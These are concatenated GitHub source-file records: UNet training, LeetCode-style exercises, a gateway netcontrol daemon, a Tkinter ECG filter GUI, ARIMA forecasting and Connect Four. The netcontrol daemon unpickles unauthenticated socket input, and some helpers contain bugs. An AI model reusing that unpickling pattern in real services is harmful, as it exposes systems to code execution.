features['image']\r\n x = tf.placeholder_with_default(x, [None, None, None, IMG_CHANNELS], name='input_image_placeholder')\r\n\r\n s = x / 255 # convert image to 0 .. 1.0\r\n\r\n c1 = conv2d_3x3(8) (s)\r\n c1 = conv2d_3x3(8) (c1)\r\n p1 = max_pool() (c1)\r\n\r\n c2 = conv2d_3x3(16) (p1)\r\n c2 = conv2d_3x3(16) (c2)\r\n p2 = max_pool() (c2)\r\n\r\n c3 = conv2d_3x3(32) (p2)\r\n c3 = conv2d_3x3(32) (c3)\r\n p3 = max_pool() (c3)\r\n\r\n c4 = conv2d_3x3(64) (p3)\r\n c4 = conv2d_3x3(64) (c4)\r\n p4 = max_pool() (c4)\r\n\r\n c5 = conv2d_3x3(128) (p4)\r\n c5 = conv2d_3x3(128) (c5)\r\n\r\n u6 = conv2d_transpose_2x2(64) (c5)\r\n u6 = concatenate([u6, c4])\r\n c6 = conv2d_3x3(64) (u6)\r\n c6 = conv2d_3x3(64) (c6)\r\n\r\n u7 = conv2d_transpose_2x2(32) (c6)\r\n u7 = concatenate([u7, c3])\r\n c7 = conv2d_3x3(32) (u7)\r\n c7 = conv2d_3x3(32) (c7)\r\n\r\n u8 = conv2d_transpose_2x2(16) (c7)\r\n u8 = concatenate([u8, c2])\r\n c8 = conv2d_3x3(16) (u8)\r\n c8 = conv2d_3x3(16) (c8)\r\n\r\n u9 = conv2d_transpose_2x2(8) (c8)\r\n u9 = concatenate([u9, c1])\r\n c9 = conv2d_3x3(8) (u9)\r\n c9 = conv2d_3x3(8) (c9)\r\n\r\n logits = tf.layers.Conv2D(1, (1, 1)) (c9)\r\n return logits\r\n\r\ndef model_fn(features, labels, mode, params={}):\r\n if mode == tf.estimator.ModeKeys.PREDICT:\r\n f, sh = pad_to_min_size_tf(features['image'], batch=True)\r\n logits = get_model({'image': f}, mode, params)\r\n\r\n mask = tf.nn.sigmoid(logits, name='sigmoid_tensor')\r\n predictions = {\r\n 'mask': mask[:,0:sh[1],0:sh[2],:], # we remove pixels added in pad_to_min_size_tf\r\n 'image': features['image'] # we return the image as well to simplify testing\r\n }\r\n\r\n export_outputs={'generate' : tf.estimator.export.PredictOutput(predictions)}\r\n return tf.estimator.EstimatorSpec(mode=mode,\r\n predictions=predictions,\r\n export_outputs=export_outputs)\r\n logits = get_model(features, mode, params)\r\n predictions = {\r\n 'mask': tf.nn.sigmoid(logits, name='sigmoid_tensor'),\r\n }\r\n print(\"\\n Prediction:\",predictions)\r\n\r\n true_mask = tf.reshape(tf.clip_by_value(labels['mask'], 0.0 ,1.0), [-1, 128,128,1])\r\n\r\n print(\"\\n True mask:\",true_mask)\r\n\r\n weights = labels['weights']\r\n loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=true_mask,\r\n logits=logits,\r\n weights=weights)\r\n\r\n # Configure the training op\r\n if mode == tf.estimator.ModeKeys.TRAIN:\r\n optimizer = tf.train.AdamOptimizer(learning_rate=1e-4)\r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n train_op = optimizer.minimize(loss, tf.train.get_or_create_global_step())\r\n\r\n else:\r\n train_op = None\r\n\r\n with tf.variable_scope('mean_iou_calc'):\r\n prec = []\r\n up_opts = []\r\n for t in np.arange(0.5, 1.0, 0.05):\r\n predicted_mask = tf.to_int32(predictions['mask'] > t)\r\n score, up_opt = tf.metrics.mean_iou(true_mask, predicted_mask, 2)\r\n up_opts.append(up_opt)\r\n prec.append(score)\r\n mean_iou = tf.reduce_mean(tf.stack(prec), axis=0), tf.stack(up_opts)\r\n print(\"\\n Predicted_mask:\", predicted_mask)\r\n\r\n eval_metrics = {'mean_iou': mean_iou}\r\n\r\n return tf.estimator.EstimatorSpec(\r\n mode=mode,\r\n predictions=predictions,\r\n loss=loss,\r\n train_op=train_op,\r\n eval_metric_ops=eval_metrics)\r\n\r\nrun_config = tf.estimator.RunConfig(keep_checkpoint_max=2)\r\nestimator = tf.estimator.Estimator(\r\n model_fn=model_fn,\r\n model_dir=\"./model_output/\"+MODEL_NAME,\r\n config=run_config)\r\n\r\n# In case you want to profile this model here is a profile hook. 
To use it add hooks=[profiler_hook] to TrainSpec.\r\ntf.gfile.MakeDirs('timelines/'+MODEL_NAME)\r\nprofiler_hook = tf.train.ProfilerHook(\r\n    save_steps=1000,\r\n    save_secs=None,\r\n    output_dir='timelines/'+MODEL_NAME,\r\n    show_dataflow=True,\r\n    show_memory=True)\r\n\r\ninput_fns = TE(input_fn(paths.train,\r\n                        batch_size=128,\r\n                        shuffle=False,\r\n                        num_epochs=10),\r\n               input_fn(paths.eval, batch_size=10, shuffle=False),)\r\nspecs = TE(tf.estimator.TrainSpec(input_fn=input_fns.train, max_steps=STEPS_IN_TRAINING),\r\n           tf.estimator.EvalSpec(input_fn=input_fns.eval, steps=STEPS_IN_EVALUATION, throttle_secs=600))\r\n\r\ntf.estimator.train_and_evaluate(estimator, specs.train, specs.eval)\r\n\r\n# def final_mask(\r\nprint(\"Finish!\")\r\n#\r\n# input(\"Press Enter\")\r\n# #PREDICTION\r\n# #This part is very similar to the one provided in the Keras kernel: we look at the predictions, then convert them to RLE.\r\n# #What is worth noting is that we feed whole images from the test set to the model one by one, without scaling.\r\n# #This is possible because UNet is a fully convolutional network without fully connected layers, so it does not care about the size\r\n# #of the image as long as it is divisible by IMG_MIN_SIZE. Otherwise it would break on the concatenation layers.\r\n# #\r\n# # img = Image.open(\"D:\\\\UNET in Tensorflow\\\\Unet_Tensor\\\\dataset\\\\image_test\\\\PNG\\\\2.png\")\r\n# # image_predict = estimator.predict(img)\r\n# # print(image_predict['image'])\r\n# train_pred = next(iter(estimator.predict(input_fns.train)))\r\n# print(train_pred['image'])\r\n# print(train_pred['mask'])\r\n# show_image_list([train_pred['image'], train_pred['mask']*255])\r\n#\r\n# eval_pred = next(iter(estimator.predict(input_fns.eval)))\r\n# show_image_list([eval_pred['image'], eval_pred['mask']])\r\n\r\n\r\n# test_paths = list(sorted(TEST_PATH.glob(\"*\")))\r\n# def pred_input_fn(paths):\r\n#     paths=list(map(str, paths))\r\n#\r\n#     def input_fn():\r\n#         ds = (tf.data.Dataset.from_tensor_slices(paths)\r\n#               .map(lambda x: load_sample_tf(x, load_mask=False))\r\n#               .map(lambda x: ({\"image\": x[IMG]}, {\"mask\": tf.zeros_like(x[IMG])})).batch(1))\r\n#         iterator = ds.make_one_shot_iterator()\r\n#         return iterator.get_next()\r\n#     return input_fn\r\n#\r\n# thr=0.5\r\n# pred = next(iter(estimator.predict(pred_input_fn(test_paths))))\r\n# preds_test = []\r\n# preds_test_t = []\r\n# for path, pred in zip(test_paths, estimator.predict(pred_input_fn(test_paths))):\r\n#     # print(path)\r\n#     mask = np.squeeze(pred['mask'])\r\n#     preds_test_t.append((mask > thr).astype(np.uint8))\r\n#     preds_test.append(mask)\r\n","repo_name":"naternguyen/Unet-Segmentation","sub_path":"unet_tf.py","file_name":"unet_tf.py","file_ext":"py","file_size_in_byte":19190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"36728884273","text":"def ispallindrome(n):\n    temp=n\n    rev=0\n    while(n>0):\n        d=n%10\n        n=n//10\n        rev=rev*10+d\n    if(rev==temp):\n        return 1\n
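# Note: when rev != temp the function falls through and returns None, which\n# is falsy, so the ==1 comparisons in the search loops below only match true\n# palindromes.\n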
print(a)","repo_name":"21A91A05C6/codemind-python","sub_path":"Closest_Palindrome_.py","file_name":"Closest_Palindrome_.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32001322351","text":"# BFS\n# queue 이용\n# 각 층계 돌 떄 마다 list에 값 넣고 길이 만큼 나눈 뒤 result에 삽입\n\nclass Solution:\n def averageOfLevels(self, root: TreeNode) -> List[float]:\n if not root:\n return None\n queue = [root]\n result = []\n while queue:\n newResult = []\n newQueue = []\n for i in queue:\n newResult.append(i.val)\n if i.left:\n newQueue.append(i.left)\n if i.right:\n newQueue.append(i.right)\n result.append(sum(newResult)/len(newResult))\n queue = newQueue[:]\n return result\n","repo_name":"plan-bug/LeetCode-Challenge","sub_path":"microcephalus7/categories/Tree/637.py","file_name":"637.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"16043141984","text":"import config\nimport os, struct, traceback\nimport socket, pickle\nimport traceback\nfrom ipset import IpsetError\nfrom managed import Net, User, get_ip, get_mac\nfrom log import logger, init_logger\n\n\"\"\"\nThis is the main script for langate2000-netcontrol.\nThis component is an interface between the langate2000 web pages and\nthe kernel network components of the gateway used during the events.\n\nHaving this component in between is important because we don't want the web server\nto have privileged access to kernel components as it is needed for this script.\n\nBoth the langate2000 django server and this components communicate using UNIX sockets.\nThe messages exchanged begin with the size of the payload (as a 4 bytes int) followed by\nthe payload itself. 
\nExample format of a *query* payload, sent by the langate2000 webserver:\n\n    {\n        \"query\": \"get_mac\",\n        \"ip\": \"172.16.1.20\"\n    }\n\nThe query parameter is mandatory and reflects the name of the function you want to call in the\nipset class.\n\nExample format of a *response* payload, sent back by this daemon:\n\n    {\n        \"success\": True,\n        \"mac\": \"ff:ff:ff:ff:ff\"\n    }\n\nThe success parameter is mandatory and is a boolean value.\nIf False, the only other value in the dict is the corresponding error message raised \nby the ipset class.\n\nNote that this daemon needs to be executed on the same machine as the one that serves the pages because it needs to access the ARP tables to find the MAC addresses of the hosts that are using the web server.\n\n\"\"\"\n\nnet = Net(mark=config.mark)\n\n# the 3 following helper functions were taken from https://stackoverflow.com/questions/17667903/python-socket-receive-large-amount-of-data\n\ndef _send(sock, data):\n    pack = struct.pack('>I', len(data)) + data\n    sock.sendall(pack)\n\ndef _recv_bytes(sock, size):\n    data = b''\n    while len(data) < size:\n        r = sock.recv(size - len(data))\n        if not r:\n            return None\n        data += r\n    return data\n\ndef _recv(sock):\n    data_length_r = _recv_bytes(sock, 4)\n\n    if not data_length_r:\n        return None\n\n    data_length = struct.unpack('>I', data_length_r)[0]\n    return _recv_bytes(sock, data_length)\n    \n\ndef parse_query(p):\n    response = {\n        \"success\": True\n    }\n\n    try:\n\n        if p[\"query\"] == \"connect_user\":\n            net.connect_user(p[\"mac\"], p[\"name\"].replace('\"',''))\n        elif p[\"query\"] == \"disconnect_user\":\n            net.disconnect_user(p[\"mac\"])\n        elif p[\"query\"] == \"get_user_info\":\n            response[\"info\"] = net.get_user_info(p[\"mac\"]).to_dict()\n        elif p[\"query\"] == \"set_mark\":\n            net.set_vpn(p[\"mac\"], p[\"mark\"])\n        elif p[\"query\"] == \"clear\":\n            net.clear()\n        elif p[\"query\"] == \"destroy\":\n            net.delete()\n        elif p[\"query\"] == \"get_ip\":\n            response[\"ip\"] = get_ip(p[\"mac\"])\n        elif p[\"query\"] == \"get_mac\":\n            response[\"mac\"] = get_mac(p[\"ip\"])\n        else:\n            raise NotImplementedError\n\n    except IpsetError as e:\n        return {\n            \"success\": False,\n            \"message\": str(e)\n        }\n\n    else:\n        return response\n\nif os.path.exists(config.netcontrol_socket_file):\n    os.remove(config.netcontrol_socket_file)\n\nwith socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as server:\n    logger.setLevel(10) # DEBUG (logging.DEBUG == 10)\n    init_logger()\n    logger.info(\"Binding socket at \\\"{}\\\"\".format(config.netcontrol_socket_file))\n    server.bind(config.netcontrol_socket_file)\n\n    logger.info(\"Listening on \\\"{}\\\".\".format(config.netcontrol_socket_file))\n\n    while True:\n        try:\n            server.listen(1)\n            client, _ = server.accept()\n            logger.debug(\"Incoming connection\")\n\n            # TODO: authenticate packet\n            q = pickle.loads(_recv(client))\n\n            r = parse_query(q)\n\n            _send(client, pickle.dumps(r))\n            logger.debug(\"Order finished\")\n            client.close()\n        except Exception:\n            traceback.print_exc()\n","repo_name":"InsaLan/langate2000-netcontrol","sub_path":"netcontrol.py","file_name":"netcontrol.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"7813078906","text":"from copy import deepcopy\nfrom typing import Any, Dict\n\nfrom aspen.database.models import PhyloTree\n\n\ndef create_id_mapped_tree(input_json: dict, prefix) -> dict:\n    clone = deepcopy(input_json)\n    clone[\"tree\"][\"name\"] = 
f\"{clone['tree']['name']}\"\n for node in clone[\"tree\"][\"children\"]:\n node[\"GISAID_ID\"] = f\"{node['name']}\"\n node[\"name\"] = node[\"name\"].replace(\"public\", \"private\")\n return clone\n\n\ndef add_subtree_prefixes(subtree, prefix):\n for node in subtree:\n node[\"name\"] = f\"{node['name']}\"\n if \"children\" in node:\n add_subtree_prefixes(node[\"children\"])\n\n\ndef add_prefixes(input_json: dict, prefix: str) -> dict:\n clone = deepcopy(input_json)\n clone[\"tree\"][\"name\"] = f\"{clone['tree']['name']}\"\n add_subtree_prefixes(clone[\"tree\"][\"children\"], prefix)\n return clone\n\n\ndef align_json_with_model(input_json: dict, phylo_tree: PhyloTree) -> dict:\n uploaded_children = []\n for index, sample in enumerate(phylo_tree.constituent_samples):\n child: Dict[str, Any] = dict()\n if index < len(input_json[\"tree\"][\"children\"]):\n child |= input_json[\"tree\"][\"children\"][index]\n else:\n child |= {\n \"node_attrs\": {\"country\": {\"value\": \"USA\"}},\n }\n child |= {\"name\": sample.public_identifier}\n uploaded_children.append(child)\n input_json[\"tree\"][\"children\"] = uploaded_children\n return input_json\n","repo_name":"chanzuckerberg/czgenepi","sub_path":"src/backend/aspen/api/views/tests/utils/phylo_tree_utils.py","file_name":"phylo_tree_utils.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"33157570269","text":"from django import forms\nfrom subjects.models import Subject, Comment\nfrom mptt.forms import TreeNodeChoiceField\n\nclass CreateSubjectForm(forms.ModelForm):\n\n class Meta:\n model = Subject\n fields = ('title', 'details','github_url', 'document_file')\n\n\nclass CreateCommentForm(forms.ModelForm):\n\n parent = TreeNodeChoiceField(queryset = Comment.objects.all())\n\n class Meta:\n model = Comment\n fields = ('text','parent',)\n \n def __init__(self, *args, **kwargs):\n super(CreateCommentForm, self).__init__(*args, **kwargs)\n self.fields['parent'].required = False\n","repo_name":"ankit0tech/Research-Productivity-Tool","sub_path":"subjects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"38419255995","text":"from tkinter.filedialog import askopenfilename\r\nimport os\r\nimport tkinter as tk\r\nfrom tkinter import * # 图形界面库\r\nimport tkinter.messagebox as messagebox # 弹窗\r\nfrom ttkbootstrap import Style\r\nfrom PIL import Image, ImageTk\r\nimport threading\r\nimport tkinter.font as tf\r\nimport numpy as np\r\nfrom Filters import LMS_AdaFilter, RLS_AdaFilter, noise_generator,NLMS_AdaFilter\r\nfrom Application import getSNR, getMSE, getFeature\r\nimport matplotlib.pyplot as plt\r\nimport scipy.signal as sig\r\n\r\n\r\nclass AdapFilterGUI:\r\n def __init__(self,root):\r\n self.initGUI(root)\r\n\r\n\r\n def initGUI(self,root):\r\n self.style = Style(theme='lumen')\r\n self.window = root\r\n self.window = self.style.master\r\n self.window.title('AdapFilter')\r\n self.window.geometry('1280x750+120+25')\r\n self.window.iconphoto(True, tk.PhotoImage(file='tt1.png'))\r\n self.data_path = StringVar()\r\n self.data_path.set(os.path.abspath(\".\"))\r\n ft = tf.Font(family='微软雅黑', size=11)\r\n self.fm = tk.LabelFrame(self.window, text='主面板',font=ft, width=1200, height=720)\r\n self.left = tk.Frame(self.fm, bg='white', width=400, height=720)\r\n self.data_input = tk.LabelFrame(self.left, text='数据载入',font=ft, 
width=400, height=90)\r\n        self.nos_setting = tk.LabelFrame(self.left, text='非平稳噪声设置',font=ft, width=400, height=90)\r\n        self.flt_setting = tk.LabelFrame(self.left, text='滤波器设置',font=ft, width=400, height=220)\r\n        self.eval = tk.LabelFrame(self.left, text='效果评价',font=ft, width=400, height=200)\r\n        self.feature = tk.LabelFrame(self.left, text='R波分析',font=ft, width=400, height=150)\r\n\r\n        self.right = tk.Frame(self.fm, bg='white', width=800, height=720)\r\n        self.org_show = tk.LabelFrame(self.right, text='原始信号',font=ft, width=800, height=220)\r\n        self.nos_show = tk.LabelFrame(self.right, text='加噪信号',font=ft, width=800, height=220)\r\n        self.flt_show = tk.LabelFrame(self.right, text='滤波信号',font=ft, width=800, height=220)\r\n\r\n        self.fm.grid(row=0, column=0, padx=15, pady=10,ipadx=3,ipady=3)\r\n        self.left.grid(row=0, column=0, padx=10, pady=3)\r\n        self.right.grid(row=0, column=1, padx=10, pady=3)\r\n        self.data_input.grid(row=0, column=0, padx=0, pady=6)\r\n        self.nos_setting.grid(row=1, column=0, padx=0, pady=6)\r\n        self.flt_setting.grid(row=2, column=0, padx=0, pady=6)\r\n        self.eval.grid(row=3, column=0, padx=0, pady=6)\r\n        self.feature.grid(row=4, column=0, padx=0, pady=6)\r\n        self.org_show.grid(row=0, column=0, padx=5, pady=2)\r\n        self.org_show.pack_propagate(0)\r\n        self.nos_show.grid(row=1, column=0, padx=5, pady=2)\r\n        self.nos_show.pack_propagate(0)\r\n        self.flt_show.grid(row=2, column=0, padx=5, pady=2)\r\n        self.flt_show.pack_propagate(0)\r\n\r\n        self.showLen = 1000\r\n        self.ok = 0\r\n        self.f1 = None\r\n        self.f2 = None\r\n        self.f3 = None\r\n\r\n        # Signal input\r\n        Label(self.data_input, text=\"选择路径: \",font=ft).grid(row=0, column=0, padx=3, pady=2)\r\n        Entry(self.data_input, textvariable=self.data_path,width=27,font=ft).grid(row=0, column=1, padx=2, pady=2)\r\n        Button(self.data_input, text=\"打开文件\",width=33,bd=2,relief='groove',font=ft, command=lambda:self.selectData()).grid(row=1, column=0,columnspan=2, padx=0, pady=5)\r\n\r\n        # Noise settings\r\n        self.snr = StringVar(value='10')\r\n        Label(self.nos_setting, text=\"信噪比: \",font=ft).grid(row=1, column=0, padx=20, pady=2)\r\n        Label(self.nos_setting, text=\"dB\",font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n        Entry(self.nos_setting, textvariable=self.snr, width=8,font=ft).grid(row=1, column=1,padx=0, pady=2)\r\n        Button(self.nos_setting, text=\"确定\",bd=2,font=ft,relief='groove',width=8, command=lambda: self.getNoise()).grid(row=1, column=3,padx=20, pady=2)\r\n\r\n        # Filter settings\r\n        Label(self.flt_setting, text=\"自适应算法选择\", font=ft, width=18).grid(row=0, column=0, padx=0, pady=2)\r\n        Label(self.flt_setting, text=\"参数设置\", font=ft, width=18).grid(row=0, column=1,columnspan=2, padx=0, pady=2)\r\n        v = tk.IntVar()\r\n        af1 = tk.Radiobutton(self.flt_setting, text='LMS', font=ft, variable=v, value=1)\r\n        af2 = tk.Radiobutton(self.flt_setting, text='NLMS', font=ft, variable=v, value=2)\r\n        af3 = tk.Radiobutton(self.flt_setting, text='RLS', font=ft, variable=v, value=3)\r\n        af1.grid(row=1, column=0, padx=0, pady=2)\r\n        af2.grid(row=2, column=0, padx=0, pady=2)\r\n        af3.grid(row=3, column=0, padx=0, pady=2)\r\n\r\n        self.mu = StringVar(value='0.05')\r\n        self.N = StringVar(value='4')\r\n        Label(self.flt_setting, text=\"步长因子:\", font=ft).grid(row=1, column=1, padx=0, pady=2)\r\n        Label(self.flt_setting, text=\"滑窗大小:\", font=ft).grid(row=2, column=1, padx=0, pady=2)\r\n        Entry(self.flt_setting, textvariable=self.mu, width=8,font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n        Entry(self.flt_setting, textvariable=self.N, width=8,font=ft).grid(row=2, column=2, padx=0, pady=2)\r\n        
Button(self.flt_setting, text=\"确定\", width=12,bd=2,font=ft,relief='groove',command=lambda: self.getFlt(v.get())).grid(row=3, column=1,columnspan=2, padx=0,pady=2)\r\n\r\n\r\n #评价\r\n self.snr0 = tk.StringVar()\r\n self.snr1 = tk.StringVar()\r\n self.mse0 = tk.StringVar()\r\n self.mse1 = tk.StringVar()\r\n Label(self.eval, text=\"滤波前\", font=ft).grid(row=1, column=1, padx=0, pady=2)\r\n Label(self.eval, text=\"滤波后\", font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n Label(self.eval, text=\"SNR\", font=ft).grid(row=2, column=0, padx=0, pady=2)\r\n Label(self.eval, text=\"MSE\", font=ft).grid(row=3, column=0, padx=0, pady=2)\r\n self.old_snr=Label(self.eval, width=10,textvariable=self.snr0,bd=1,relief='groove')\r\n self.old_snr.grid(row=2, column=1, padx=0, pady=2)\r\n self.new_snr = Label(self.eval, width=10,textvariable=self.snr1,bd=1,relief='groove')\r\n self.new_snr.grid(row=2, column=2, padx=0, pady=2)\r\n\r\n self.old_mse = Label(self.eval, width=10,textvariable=self.mse0,bd=1,relief='groove')\r\n self.old_mse.grid(row=3, column=1, padx=0, pady=2)\r\n self.new_mse = Label(self.eval, width=10,textvariable=self.mse1,bd=1,relief='groove')\r\n self.new_mse.grid(row=3, column=2, padx=0, pady=2)\r\n Button(self.eval, text=\"分 析\", width=35, bd=2, font=ft, relief='groove',command=lambda: self.showEval()).grid(row=4, column=0,columnspan=3, padx=5,pady=2)\r\n\r\n #特征提取\r\n self.hr = tk.StringVar()\r\n self.rr = tk.StringVar()\r\n Label(self.feature, text=\"心率\", font=ft).grid(row=1, column=0, padx=0, pady=2)\r\n Label(self.feature, text=\"R-R间期\", font=ft).grid(row=2, column=0, padx=0, pady=2)\r\n Label(self.feature, text=\"次/分\", font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n Label(self.feature, text=\"s\", font=ft).grid(row=2, column=2, padx=0, pady=2)\r\n self.hrshow = Label(self.feature, width=10,textvariable=self.hr,bd=1,relief='groove')\r\n self.hrshow.grid(row=1, column=1, padx=0, pady=2)\r\n self.rrshow = Label(self.feature, width=10,textvariable=self.rr,bd=1,relief='groove')\r\n self.rrshow.grid(row=2, column=1, padx=0, pady=2)\r\n Button(self.feature, text=\"分 析\", width=35, bd=2, font=ft, relief='groove', command=lambda: self.showFeat()).grid(row=3, column=0, columnspan=3, padx=5, pady=2)\r\n\r\n self.window.mainloop() # 主消息循环\r\n\r\n #选择输入信号数据路径\r\n def selectData(self):\r\n path_ = askopenfilename() # 使用askdirectory()方法返回文件夹的路径\r\n if path_ == \"\":\r\n self.data_path.get() # 当打开文件路径选择框后点击\"取消\" 输入框会清空路径,所以使用get()方法再获取一次路径\r\n else:\r\n path_ = path_.replace(\"/\", \"\\\\\") # 实际在代码中执行的路径为“\\“ 所以替换一下\r\n self.data_path.set(path_)\r\n if '.npy' in path_:\r\n self.getData()\r\n else:\r\n messagebox.showinfo('错误!', '文件格式出错')\r\n\r\n #评价指标计算并显示\r\n def showEval(self):\r\n if self.ok == 2:\r\n snr0 = getSNR(self.org,self.noise_data)\r\n snr1 = getSNR(self.org[:len(self.flt_data)],self.flt_data)\r\n self.snr0.set(str(round(snr0, 2)))\r\n self.snr1.set(str(round(snr1, 2)))\r\n\r\n mse0 = getMSE(self.org,self.noise_data) * 1000\r\n mse1 = getMSE(self.org[:len(self.flt_data)],self.flt_data) * 1000\r\n self.mse0.set(str(round(mse0, 2)))\r\n self.mse1.set(str(round(mse1, 2)))\r\n else:\r\n messagebox.showinfo('错误!', '请重新操作')\r\n\r\n #R波分析结果计算并显示\r\n def showFeat(self):\r\n if self.ok == 2:\r\n rr,hr = getFeature(self.flt_data)\r\n self.hr.set(str(round(hr, 1)))\r\n self.rr.set(str(round(rr, 2)))\r\n\r\n data_mean = np.mean(self.flt_data[-self.showLen:])\r\n p_id, _ = sig.find_peaks(self.flt_data[-self.showLen:], distance=70, height=data_mean*1.1)\r\n p_val = 
# Run the selected adaptive filter\r\n    def getFlt(self,flag):\r\n        if self.ok == 2:\r\n            if flag == 1:\r\n                self.flt_data = LMS_AdaFilter(self.noise, self.noise_data,int(self.N.get()),float(self.mu.get()))\r\n                self.show(3)\r\n            elif flag == 2:\r\n                self.flt_data = NLMS_AdaFilter(self.noise, self.noise_data,int(self.N.get()),float(self.mu.get()))\r\n                self.show(3)\r\n            elif flag == 3:\r\n                self.flt_data = RLS_AdaFilter(self.noise, self.noise_data,int(self.N.get()))\r\n                self.show(3)\r\n            else:\r\n                messagebox.showinfo('错误!', '请选择一个算法')\r\n        elif self.ok == 0:\r\n            messagebox.showinfo('错误!', '请先加载原数据')\r\n        else:\r\n            messagebox.showinfo('错误!', '请先加载噪声数据')\r\n\r\n    # Display a signal\r\n    def show(self,flag):\r\n        if flag == 1:\r\n\r\n            global orgPic\r\n            plt.figure()\r\n            plt.plot(self.org[-self.showLen:])\r\n            plt.axis('off')\r\n            plt.savefig(\"org.png\", bbox_inches='tight')\r\n            img1 = Image.open('org.png')\r\n            img1 = img1.resize((800, 220))\r\n            orgPic = ImageTk.PhotoImage(img1)\r\n            if not self.f1:\r\n                self.f1 = Label(self.org_show, image=orgPic)\r\n                self.f1.pack()\r\n            else:\r\n                self.f1.configure(image=orgPic)\r\n                self.f1.image = orgPic\r\n        elif flag == 2:\r\n            global noisePic\r\n            plt.figure()\r\n            plt.plot(self.noise_data[-self.showLen:])\r\n            plt.axis('off')\r\n            plt.savefig(\"noise.png\", bbox_inches='tight')\r\n            img2 = Image.open('noise.png')\r\n            img2 = img2.resize((800, 220))\r\n            noisePic = ImageTk.PhotoImage(img2)\r\n            if not self.f2:\r\n                self.f2 = Label(self.nos_show, image=noisePic)\r\n                self.f2.pack()\r\n            else:\r\n                self.f2.configure(image=noisePic)\r\n                self.f2.image = noisePic\r\n        elif flag == 3:\r\n            global fltPic\r\n            plt.figure()\r\n            plt.plot(self.flt_data[-self.showLen:])\r\n            plt.axis('off')\r\n            plt.savefig(\"flt.png\", bbox_inches='tight')\r\n            img3 = Image.open('flt.png')\r\n            img3 = img3.resize((800, 220))\r\n            fltPic = ImageTk.PhotoImage(img3)\r\n            if not self.f3:\r\n                self.f3 = Label(self.flt_show, image=fltPic)\r\n                self.f3.pack()\r\n            else:\r\n                self.f3.configure(image=fltPic)\r\n                self.f3.image = fltPic\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    try:\r\n        root = Tk()\r\n        AdapFilterGUI(root)\r\n    except:\r\n        messagebox.showinfo('错误!', '请重新操作')","repo_name":"kafchen/ECGprocessing","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":13286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"10737230026","text":"# Definition for a binary tree node\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\n\nclass Solution:\n    # @param A : root node of tree\n    # @return a list of integers\n    def preorderTraversal(self, A):\n        if not A:\n            return list()\n        output, stack = list(), list()\n        stack.append(A)\r\n        
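# Pushing the right child before the left one means the left child is\n        # popped first, so nodes are emitted in root -> left -> right order.\n        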
while stack:\n popped = stack.pop()\n output.append(popped.val)\n if popped.right:\n stack.append(popped.right)\n if popped.left:\n stack.append(popped.left)\n return output\n","repo_name":"purushothamc/myibitsolutions","sub_path":"trees/iterative_pre_order.py","file_name":"iterative_pre_order.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"120478001","text":"import pandas as pd\nfrom matplotlib import pyplot\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n \n\nseries =pd.read_csv(\"C:\\\\Users\\\\mohamed ismail\\\\Desktop\\\\GP And Data\\\\Telecom Egypt.csv\")\nX = series.iloc[:,-1].values\n\nsize = int(len(X) * 0.66)\ntrain, test = X[0:size], X[size:len(X)]\n\nhistory = [x for x in train]\npredictions = list()\n\nfor t in range(len(test)):#\n\tmodel = ARIMA(history, order=(6,1,0))\n\tmodel_fit = model.fit(disp=0)\n\toutput = model_fit.forecast()\n\tyhat = output[0]\n\tpredictions.append(yhat)\n\tobs = test[t]\n\thistory.append(obs)\n\tprint('predicted=%f, expected=%f' % (yhat, obs))\n \nerror = mean_squared_error(test, predictions)\nprint('Test MSE: %.3f' % error)\n# plot\npyplot.plot(test,color='blue',label=\"actual\")\npyplot.plot(predictions, color='red',label=\"prediction\")\npyplot.legend()\npyplot.show()","repo_name":"MohamedAhmedIsmail/Algo-Trading-Models-Machine-Learning","sub_path":"Models/ARIMA_MODEL.py","file_name":"ARIMA_MODEL.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"40947207868","text":"import connectfour\n\nCOLOR = {connectfour.RED:'Red', connectfour.YELLOW:'Yellow'}\n\ndef print_board(gamestate) -> None:\n ui = ' 1 2 3 4 5 6 7\\n'\n\n for column in range(connectfour.BOARD_ROWS):\n for row in range(connectfour.BOARD_COLUMNS): \n if gamestate.board[row][column] == 1:\n ui += ' R '\n elif gamestate.board[row][column] == 2:\n ui += ' Y '\n elif gamestate.board[row][column] == 0:\n ui += ' . '\n\n if row == connectfour.BOARD_ROWS:\n ui += '\\n' \n \n print(ui)\n\n\ndef user_input(game_state) -> str:\n while True:\n input_pop_or_drop = input(f\" {COLOR[game_state.turn]} Pop or Drop (SPACE) Column(1-7) Ex. 
